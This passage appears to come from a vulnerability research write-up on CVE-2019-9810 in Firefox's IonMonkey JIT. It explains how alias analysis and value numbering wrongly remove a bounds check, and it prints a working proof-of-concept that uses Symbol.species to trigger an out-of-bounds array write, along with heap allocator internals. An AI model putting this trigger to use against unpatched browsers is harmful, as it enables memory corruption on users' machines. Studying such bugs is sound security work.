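console.log(genericMightAlias(newarray9, unrelated)); // NoAlias
console.log(genericMightAlias(newarray9, null));      // MayAlias
```

The only path that yields NoAlias is the one where both objects are known, both carry type information, and the two type sets are disjoint.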

If genericMightAlias returns MayAlias the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable which is the load instruction. This method is a virtual method that can be overridden by instructions in which case they get a chance to specify a specific behavior there.

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
// Return whether this load may depend on the specified store, given
// that the alias sets intersect. This may be refined to exclude
// possible aliasing in cases where alias set flags are too imprecise.
if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
return AliasType::NoAlias;
}
MOZ_ASSERT(!isEffectful() && store->isEffectful());
return AliasType::MayAlias;
}


As a reminder, in our case, the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields) as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Load(AliasSet::ObjectFields);
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};


We are nearly done, but the algorithm doesn't quite end just yet. It keeps iterating through the store candidates as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not just any store, as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
MInstructionVector& aliasedStores = stores[*iter];
for (int i = aliasedStores.length() - 1; i >= 0; i--) {
MInstruction* store = aliasedStores[i];
if (genericMightAlias(*def, store) !=
MDefinition::AliasType::NoAlias &&
def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
BlockMightReach(store->block(), *block)) {
if (lastStore->id() < store->id()) {
lastStore = store;
}
break;
}
}
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");


In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14


Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

1. It iterates over the instructions in the basic block and only cares about store and load instructions
   1. If the instruction is a store, it gets added to a vector to keep track of it
   2. If the instruction is a load, it evaluates it against every store in the vector
      1. If the load and the store MayAlias, a dependency link is created between them
         1. mightAlias checks the intersection of both AliasSets
         2. genericMightAlias checks the intersection of both TypeSets
      2. If the engine can prove that there is NoAlias possible, then the algorithm carries on
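
To tie the recap together, here is a toy JavaScript version of the pass for a single basic block, run against the simplified MIR of x. It makes two big assumptions: every instruction operates on the same object (so the TypeSet check always answers MayAlias and is left out), and alias set categories are plain strings. The analyze function and the shape of the instruction records are hypothetical.

```javascript
// The simplified MIR of x: only instructions with a non-empty alias set.
const block = [];
for (const base of [12, 17, 22, 27]) {
  block.push({ id: base, op: "elements", kind: "load", categories: ["ObjectFields"] });
  block.push({ id: base + 1, op: "storeelement", kind: "store", categories: ["Element"] });
  block.push({ id: base + 2, op: "setinitializedlength", kind: "store", categories: ["ObjectFields"] });
}
block.push({ id: 33, op: "elements", kind: "load", categories: ["ObjectFields"] });
block.push({ id: 34, op: "arraylength", kind: "load", categories: ["ObjectFields"] });
block.push({ id: 35, op: "arrayslice", kind: "store", categories: ["Element", "ObjectFields"] });

function analyze(instructions, firstIns) {
  const stores = { Element: [], ObjectFields: [] };
  const dependencies = {};
  for (const ins of instructions) {
    if (ins.kind === "store") {
      // Stores are only recorded, one vector per category.
      for (const category of ins.categories) {
        stores[category].push(ins);
      }
      continue;
    }
    // Load: keep the most recent store among the categories it reads.
    let lastStore = firstIns;
    for (const category of ins.categories) {
      const candidates = stores[category];
      if (candidates.length > 0) {
        const store = candidates[candidates.length - 1];
        if (lastStore.id < store.id) {
          lastStore = store;
        }
      }
    }
    dependencies[`${ins.op}${ins.id}`] = `${lastStore.op}${lastStore.id}`;
  }
  return dependencies;
}

// start4 plays the role of firstIns in AliasAnalysis::analyze.
console.log(analyze(block, { id: 4, op: "start" }));
```

The resulting map lines up with the alias-sum output shown earlier for x: elements12 falls back to start4 because no store precedes it, and every later load points at the closest preceding setinitializedlength.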

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction, which ensures that dependencies are created between arrayslice and load instructions (which also means fewer opportunities for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::MaybeCopyElementsForWrite:
case MDefinition::Opcode::MaybeToDoubleElement:
case MDefinition::Opcode::TypedArrayLength:
case MDefinition::Opcode::TypedArrayByteOffset:
case MDefinition::Opcode::SetTypedObjectOffset:
case MDefinition::Opcode::SetDisjointTypedElements:
case MDefinition::Opcode::ArrayPopShift:
case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
case MDefinition::Opcode::StoreTypedArrayElementHole:
case MDefinition::Opcode::StoreFixedSlot:
case MDefinition::Opcode::GetPropertyPolymorphic:
case MDefinition::Opcode::SetPropertyPolymorphic:
case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::TypedArrayElements:
case MDefinition::Opcode::TypedObjectElements:
case MDefinition::Opcode::CopyLexicalEnvironmentObject:
case MDefinition::Opcode::IsPackedArray:
object = ins->getOperand(0);
break;
case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
case MDefinition::Opcode::GetDOMProperty:
case MDefinition::Opcode::GetDOMMember:
case MDefinition::Opcode::Call:
case MDefinition::Opcode::Compare:
case MDefinition::Opcode::GetArgumentsObjectArg:
case MDefinition::Opcode::SetArgumentsObjectArg:
case MDefinition::Opcode::GetFrameArgument:
case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::WasmAtomicExchangeHeap:
case MDefinition::Opcode::WasmStoreGlobalVar:
case MDefinition::Opcode::WasmStoreGlobalCell:
case MDefinition::Opcode::WasmStoreRef:
case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
return nullptr;
default:
#ifdef DEBUG
// Crash when the default aliasSet is overriden, but when not added in the
// list above.
if (!ins->getAliasSet().isStore() ||
ins->getAliasSet().flags() != AliasSet::Flag::Any) {
MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
TRIVIAL_NEW_WRAPPERS
NAMED_OPERANDS((0, object), (1, begin), (2, end))

JSObject* templateObj() const { return templateObj_; }

gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(templateObj_);
}
};

class MArrayJoin : public MBinaryInstruction,
public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
// Constructors need to perform a GetProp on the function prototype.
// Since getters cannot be set on the prototype, fetching is non-effectful.
// The operation may be safely repeated in case of bailout.
void setIdempotent() { idempotent_ = true; }
AliasSet getAliasSet() const override {
if (!idempotent_) {
return AliasSet::Store(AliasSet::Any);
}
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
}
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(name_);
}
};

// Inline call to handle lhs[rhs]. The first input is a Value so that this


The instructions that don't define any refinements inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit from jit::MDefinition):

virtual AliasSet getAliasSet() const {
// Instructions are effectful by default.
return AliasSet::Store(AliasSet::Any);
}
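
To see why falling back to the default matters, here is a small JavaScript sketch comparing how arrayslice could be evaluated against a load before and after the patch. It is a model under stated assumptions: the flag values other than ObjectFields = 1 are made up, a type set is a Set of hypothetical group names, and I assume that the array being sliced and the array being loaded from have disjoint type sets.

```javascript
// Alias set categories as bit flags. ObjectFields = 1 matches the "(flags 1)"
// spew shown earlier; Element and Any are assumed values.
const ObjectFields = 1 << 0;
const Element = 1 << 1;
const Any = 0xff;

// Two unrelated objects. Disjoint type sets are an assumption of this sketch.
const arr = { name: "Arr", typeSet: new Set(["ArrayGroup"]) };
const special = { name: "Special", typeSet: new Set(["SoSpecialGroup"]) };

// A load of Arr's elements pointer.
const loadOnArr = { op: "elements", flags: ObjectFields, object: arr };

// Before the patch: refined alias set, GetObject returns operand 0.
const sliceBefore = { op: "arrayslice", flags: Element | ObjectFields, object: special };
// After the patch: default Store(Any), GetObject returns nullptr.
const sliceAfter = { op: "arrayslice", flags: Any, object: null };

function typeSetsIntersect(a, b) {
  for (const group of a) {
    if (b.has(group)) {
      return true;
    }
  }
  return false;
}

// Returns true when the load has to be marked as depending on the store.
function dependsOn(load, store) {
  if ((load.flags & store.flags) === 0) {
    return false; // alias sets are disjoint
  }
  if (!load.object || !store.object) {
    return true; // unknown object: MayAlias
  }
  return typeSetsIntersect(load.object.typeSet, store.object.typeSet);
}

console.log(dependsOn(loadOnArr, sliceBefore)); // false
console.log(dependsOn(loadOnArr, sliceAfter));  // true
```

In this model the patched arrayslice can no longer be ruled out by the type-based check, so every later load that reads an intersecting category ends up depending on it.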


Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x30, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();


It’s usually a good idea to compare the behavior of the patched component before and after the fix. The output below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer removed the alias set refinement of the arrayslice instruction, which means it falls back to the conservative default alias set. If we take a look at the MIR graph of the Target function on a vulnerable build, this is what we see (on pass#9 Alias analysis and on pass#10 GVN):

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straightforward to go through and is broken down into three pieces, just like the original JavaScript code:

• The first step loads the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length of the array (initializedlength; it's not quite the length but it doesn't matter for now) and finally ensures that the index is within Arr's bounds.
• Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
• Finally, like in the first step, we have another set of instructions that do the same thing, but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation of the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32, we do not see another instruction that loads anything related to unbox9:Object, and as a result none of those instructions has a dependency on the slice operation. In the fixed version, even though we get the same MIR code, the alias set for the arrayslice instruction is now Store(Any) and GetObject returns null instead of the instruction's first operand; together, these make genericMightAlias return Alias::MayAlias. If the engine cannot prove that there is no aliasing, it stays conservative and creates a dependency. That’s what explains this part in the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27
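
To make the decision above a bit more concrete, here is a toy model of it in JavaScript. It is only a sketch under assumptions: the category names mirror the ones visible in the diff, but the bit values, the mightAlias helper and the way objects are compared (plain identity, whereas the engine reasons about the objects involved in its own way) are invented for illustration and are not Ion's code.

```javascript
// Toy model of the aliasing decision; names and bit values are illustrative.
const Flags = { ObjectFields: 1, Element: 2, FixedSlot: 4, DynamicSlot: 8 };
Flags.Any =
  Flags.ObjectFields | Flags.Element | Flags.FixedSlot | Flags.DynamicSlot;

// `object` is the object an instruction is known to operate on, or null
// when the analysis cannot tell (assumption: identity comparison is enough).
function mightAlias(load, store) {
  if ((load.flags & store.flags) === 0) {
    return false; // disjoint categories never alias
  }
  if (load.object === null || store.object === null) {
    return true; // unknown object: stay conservative
  }
  return load.object === store.object;
}

const loadInitLen = {
  name: "initializedlength33",
  flags: Flags.ObjectFields,
  object: "Arr",
};
// Refined alias set and known object, as on the vulnerable build.
const vulnerableSlice = {
  name: "arrayslice27",
  flags: Flags.Element | Flags.ObjectFields,
  object: "Special",
};
// Default Store(Any) and no known object, as on the fixed build.
const patchedSlice = { name: "arrayslice27", flags: Flags.Any, object: null };

console.log(mightAlias(loadInitLen, vulnerableSlice)); // false
console.log(mightAlias(loadInitLen, patchedSlice)); // true
```

In this model the categories overlap in both cases; what changes the outcome is that the patched instruction no longer exposes an object that could be told apart from Arr.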


Now looking at the graph after the GVN pass has executed we can start to see that the graph has been simplified / modified. One of the things that sounds pretty natural is to eliminate a good part of the green block as it is mostly a duplicate of the blue block; as a result, only the storeelement instruction is kept. This is safe based on the assumption that Arr cannot be changed in between. Less code and one bounds check instead of two are also good for code size and runtime performance, which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.species], they can redefine the ctor used to build the result of the slice. Coupled with the fact that slicing a JavaScript array results in a newly built array, this gives you the opportunity to do badness here. For example, we can set Arr's length to zero, and because the bounds check happens only at the beginning of the function, the length changes after 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
};
}
};


The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.
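
If you want to convince yourself that slice really does call back into user code, the following standalone snippet shows it with nothing but spec-compliant JavaScript (no JIT involved, so nothing goes out of bounds). The names victim, calls and Sneaky are made up for this illustration.

```javascript
// slice() on a subclass instance consults Symbol.species and calls
// whatever constructor the getter returns.
let victim = [1, 2, 3, 4];
let calls = 0;

class Sneaky extends Array {
  static get [Symbol.species]() {
    return function () {
      calls++;
      victim.length = 0; // side effect on an unrelated array, mid-slice
    };
  }
}

const sneaky = new Sneaky();
sneaky.slice();

console.log(calls, victim.length); // 1 0
```

The side effect happens in the middle of the slice call, which is exactly the window the compiled Target function assumes cannot exist.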

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is the Global Value Numbering (abbreviated GVN), which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
// canonicalization, eliminating statically fully-redundant expressions,
// deleting dead instructions, and removing unreachable blocks.
MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);


The interesting part of this comment for us is "eliminating statically fully-redundant expressions": what if we could get it to incorrectly eliminate a supposedly redundant bounds check, for example?

The pass itself isn’t as small as the alias analysis and looks more complicated. So we won’t follow the algorithm line by line like above; instead I am just going to try to give you an idea of the type of modifications it can make to the graph and, more importantly, how it uses the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla’s wiki, which is great as it’s going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt-into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
// In the default case, there are no constants to fold.
return this;
}


The congruentTo function evaluates if the current instruction is identical to the instruction passed in argument. If they are, one can be replaced by the other: the redundant one gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding, in which case it computes and creates a new MIR node that it returns. In the default case, the implementation returns this, which doesn’t change the node in the graph.

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Replacing Constant8 with Constant4
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Replacing Slots29 with Slots13
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Replacing Elements32 with Elements17
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Recording Box37


At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and fold expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
// If one of the instructions depends on a store, and the other instruction
// does not depend on the same store, the instructions are not congruent.
if (k->dependency() != l->dependency()) {
return false;
}
bool congruent =
k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
if (congruent != l->congruentTo(k)) {
JitSpew(
JitSpew_GVN,
"      congruentTo relation is not symmetric between %s%u and %s%u!!",
k->opName(), k->id(), l->opName(), l->id());
}
#endif
return congruent;
}


Before invoking the instructions’ congruentTo implementation, the algorithm verifies that the two instructions share the same dependency. This is the very line that ties together the alias analysis result and the global value numbering optimization; pretty exciting, uh :)?

To understand what is going on we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from the vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6


And here is the MIR code:

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same, which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression it records it in case it encounters a similar one in the future. If it does, it might choose to replace one instruction with the other. And so it carries on and eventually hits the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, all those instructions have the same dependency on start6, so the check is satisfied. The second step is to invoke MBoundsCheck's implementation of congruentTo, which ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
if (!ins->isBoundsCheck()) {
return false;
}
const MBoundsCheck* other = ins->toBoundsCheck();
if (minimum() != other->minimum() || maximum() != other->maximum()) {
return false;
}
if (fallible() != other->fallible()) {
return false;
}
return congruentIfOperandsEqual(other);
}


Because the algorithm has already run on the previous instructions, it has already replaced 28 to 33 by 12 to 18. This means that as far as congruentTo is concerned the two instructions are the same and it is safe for Ion to remove 34 and only have one boundscheck instruction in this function. You can also see this in the GVN spew below that I edited just to show the relevant parts:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
...
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
...
[GVN]       Replacing Constant28 with Constant12
[GVN]       Replacing Slots29 with Slots13
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Replacing Elements32 with Elements17
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Replacing BoundsCheck34 with BoundsCheck19


Wow, we did it: we followed the redundancy elimination all the way from the alias analysis to the GVN.

Now if we have a look at the alias summary spew for a fixed version of Ion this is what we see:

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


In this case, the two regions of code have a different dependency; the first block depends on start6 as above, but the second is now dependent on arrayslice27. This makes the instructions non-congruent, and this is the very thing that prevents GVN from replacing the second region by the first one :).
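
Here is a toy value numbering pass that reproduces both outcomes. It is a sketch, not Ion's algorithm: runToyGVN and targetGraph are hypothetical helpers, the operand wiring is simplified (Arr and Idx stand in for the real operands), and congruence is reduced to "same opcode, same operands, same dependency".

```javascript
// Toy value numbering over a straight-line list of instructions.
// `dependency` is what alias analysis recorded (null when there is none).
function runToyGVN(instructions) {
  const seen = new Map(); // congruence key -> id of the recorded instruction
  const replacedBy = new Map(); // discarded id -> id of its replacement

  const resolve = (operand) =>
    replacedBy.has(operand) ? replacedBy.get(operand) : operand;

  for (const ins of instructions) {
    // Operands are looked up after earlier replacements, then the key
    // combines opcode, operands and dependency.
    const operands = ins.operands.map(resolve);
    const key = [ins.op, operands.join(","), String(ins.dependency)].join("|");
    if (seen.has(key)) {
      replacedBy.set(ins.id, seen.get(key));
    } else {
      seen.set(key, ins.id);
    }
  }
  return replacedBy;
}

// Simplified version of the two regions of Target; only the dependency of
// the second region changes between the vulnerable and the fixed build.
function targetGraph(secondRegionDependency) {
  return [
    { id: "elements17", op: "elements", operands: ["Arr"], dependency: "start6" },
    { id: "initializedlength18", op: "initializedlength", operands: ["elements17"], dependency: "start6" },
    { id: "boundscheck19", op: "boundscheck", operands: ["Idx", "initializedlength18"], dependency: null },
    { id: "elements32", op: "elements", operands: ["Arr"], dependency: secondRegionDependency },
    { id: "initializedlength33", op: "initializedlength", operands: ["elements32"], dependency: secondRegionDependency },
    { id: "boundscheck34", op: "boundscheck", operands: ["Idx", "initializedlength33"], dependency: null },
  ];
}

const vulnerable = runToyGVN(targetGraph("start6"));
const patched = runToyGVN(targetGraph("arrayslice27"));

console.log(vulnerable.get("boundscheck34")); // boundscheck19
console.log(patched.has("boundscheck34")); // false
```

Note that in this model boundscheck34 carries no dependency of its own; it survives on the patched graph only because its initializedlength operand could not be replaced.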

Reaching state of no unknowns

Now that we finally understand what is going on, let's keep pushing until we reach what I call the state of no unknowns. What I mean by that is simply to be able to explain every little detail of the PoC and be in full control of it.

And at the end of the day, there is no magic. It's just code and the truth is out there :).

At this point, this is the PoC I am trying to demystify a bit more (if you want to follow along):

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x30, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBB);
}

main();


In the following sections we walk through various aspects of the PoC, SpiderMonkey and IonMonkey internals in order to gain an even better understanding of all the behaviors at play here. It might be only < 100 lines of code but a lot of things happen :).

Phew, you made it here! I guess it is a good point where people that were only interested in the root-cause of this issue can stop reading: we have shed enough light on the vulnerability and its roots. For the people that want more though, and that still have a lot of questions like 'why is this working and this is not', 'why is it not crashing reliably' or 'why does this line matter' then fasten your seat belt and let's go!

The Nursery

The first stop is to explain in more detail how one of the three heap allocators in SpiderMonkey works: the Nursery.

The Nursery is actually, for once, a very simple allocator. It is useful and important to know how it is designed as it gives you natural answers to the things it is able to do and the things it cannot (by design).

The Nursery is specific to a JSRuntime and by default has a maximum size of 16MB (you can tweak the size with --nursery-size with the JavaScript shell js.exe). The memory is allocated by VirtualAlloc (by chunks of 0x100000 bytes PAGE_READWRITE memory) in js::gc::MapAlignedPages and here is an example call-stack:

 # Call Site
00 KERNELBASE!VirtualAlloc
01 js!js::gc::MapAlignedPages
02 js!js::gc::GCRuntime::getOrAllocChunk
03 js!js::Nursery::init
04 js!js::gc::GCRuntime::init
05 js!JSRuntime::init
06 js!js::NewContext
07 js!main


This contiguous region of memory is called a js::NurseryChunk and the allocator places such a structure there. The js::NurseryChunk starts with the actual usable space for allocations and has a trailer metadata at the end:

const size_t ChunkShift = 20;
const size_t ChunkSize = size_t(1) << ChunkShift;

const size_t ChunkTrailerSize = 2 * sizeof(uintptr_t) + sizeof(uint64_t);

static const size_t NurseryChunkUsableSize =
gc::ChunkSize - gc::ChunkTrailerSize;

struct NurseryChunk {
char data[Nursery::NurseryChunkUsableSize];
gc::ChunkTrailer trailer;

static NurseryChunk* fromChunk(gc::Chunk* chunk);
void poisonAndInit(JSRuntime* rt, size_t extent = ChunkSize);
void poisonAfterSweep(size_t extent = ChunkSize);
uintptr_t start() const { return uintptr_t(&data); }
uintptr_t end() const { return uintptr_t(&trailer); }
gc::Chunk* toChunk(JSRuntime* rt);
};


Every js::NurseryChunk is 0x100000 bytes long (on x64) or 256 pages total and has effectively 0xfffe8 usable bytes (the rest is metadata). The allocator purposely tries to fragment those regions in the virtual address space of the process (in x64) and so there is not a specific offset in between all those chunks.
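
These sizes can be double-checked from the constants in the snippet above. The short computation below assumes a 64-bit build (8-byte uintptr_t) and 4 KiB pages; the constant names POINTER_SIZE, UINT64_SIZE and PAGE_SIZE are mine.

```javascript
// Recompute the NurseryChunk layout numbers for a 64-bit build.
const POINTER_SIZE = 8; // sizeof(uintptr_t) on x64
const UINT64_SIZE = 8; // sizeof(uint64_t)
const PAGE_SIZE = 0x1000; // assuming 4 KiB pages

const ChunkShift = 20;
const ChunkSize = 1 << ChunkShift;
const ChunkTrailerSize = 2 * POINTER_SIZE + UINT64_SIZE;
const NurseryChunkUsableSize = ChunkSize - ChunkTrailerSize;

console.log(ChunkSize.toString(16)); // 100000
console.log(ChunkSize / PAGE_SIZE); // 256
console.log(ChunkTrailerSize.toString(16)); // 18
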